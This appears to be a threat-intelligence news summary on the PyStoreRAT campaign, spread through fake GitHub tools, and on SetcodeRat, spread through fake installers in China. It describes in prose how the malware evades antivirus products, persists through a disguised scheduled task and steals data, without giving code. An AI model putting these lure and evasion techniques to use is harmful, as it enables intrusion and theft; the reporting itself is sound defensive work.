Key Takeaways
- A new campaign is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.
- PyStoreRAT is a modular, multi-stage implant that can execute various types of modules and deploy an information stealer known as Rhadamanthys.
- The malware is distributed through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities.
- The threat actors behind the campaign are using social media platforms to promote the malicious repositories and artificially inflate their star and fork metrics.
- Another new remote access trojan (RAT) codenamed SetcodeRat is being propagated in China via malvertising lures, infecting hundreds of computers, including those belonging to governments and enterprises.
Introduction to PyStoreRAT
Cybersecurity researchers have identified a new campaign that is using GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. The repositories, which are often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe’. This malware has been described as a "modular, multi-stage" implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules.
Distribution and Infection Chain
The distribution of PyStoreRAT involves embedding Python or JavaScript loader stubs in GitHub repositories that masquerade as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities. These repositories are promoted via social media platforms like YouTube and X, and the threat actors behind the campaign artificially inflate the repositories’ star and fork metrics to make them appear legitimate. Once a user executes the loader stub, it triggers the execution of a remote HTML Application (HTA) payload that delivers the PyStoreRAT malware. The malware then profiles the system, checks for administrator privileges, and scans the system for cryptocurrency wallet-related files.
PyStoreRAT Capabilities and Evasion Techniques
PyStoreRAT comes with capabilities to execute various types of modules, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload. To evade detection, the loader stub gathers a list of installed antivirus products and checks strings matching "Falcon" (a reference to CrowdStrike Falcon) or "Reason" (a reference to Cybereason or ReasonLabs). If it detects any of these products, it launches "mshta.exe" by means of "cmd.exe" to reduce visibility. The malware also sets up a scheduled task disguised as an NVIDIA app self-update to achieve persistence.
SetcodeRat: A New RAT in China
In addition to PyStoreRAT, another new remote access trojan (RAT) codenamed SetcodeRat is being propagated in China via malvertising lures. This malware is disguised as legitimate installers for popular programs like Google Chrome and only proceeds to the next stage if the system language corresponds to Mainland China, Hong Kong, Macao, or Taiwan. SetcodeRat can connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft. The malware enables the threat actors to take screenshots, log keystrokes, read folders, set folders, start processes, run "cmd.exe", set socket connections, collect system and network connection information, and update itself to a new version.
Conclusion and Implications
The discovery of PyStoreRAT and SetcodeRat highlights the evolving nature of remote access trojans and the tactics used by threat actors to distribute them. The use of GitHub-hosted repositories and social media platforms to promote malicious tools is a concerning trend, as it exploits the trust that users have in these platforms. The modular and multi-stage design of PyStoreRAT makes it a formidable threat, and its ability to evade detection by traditional EDR solutions is a significant concern. As the threat landscape continues to evolve, it is essential for cybersecurity researchers and practitioners to stay vigilant and develop effective countermeasures to detect and mitigate these types of threats.
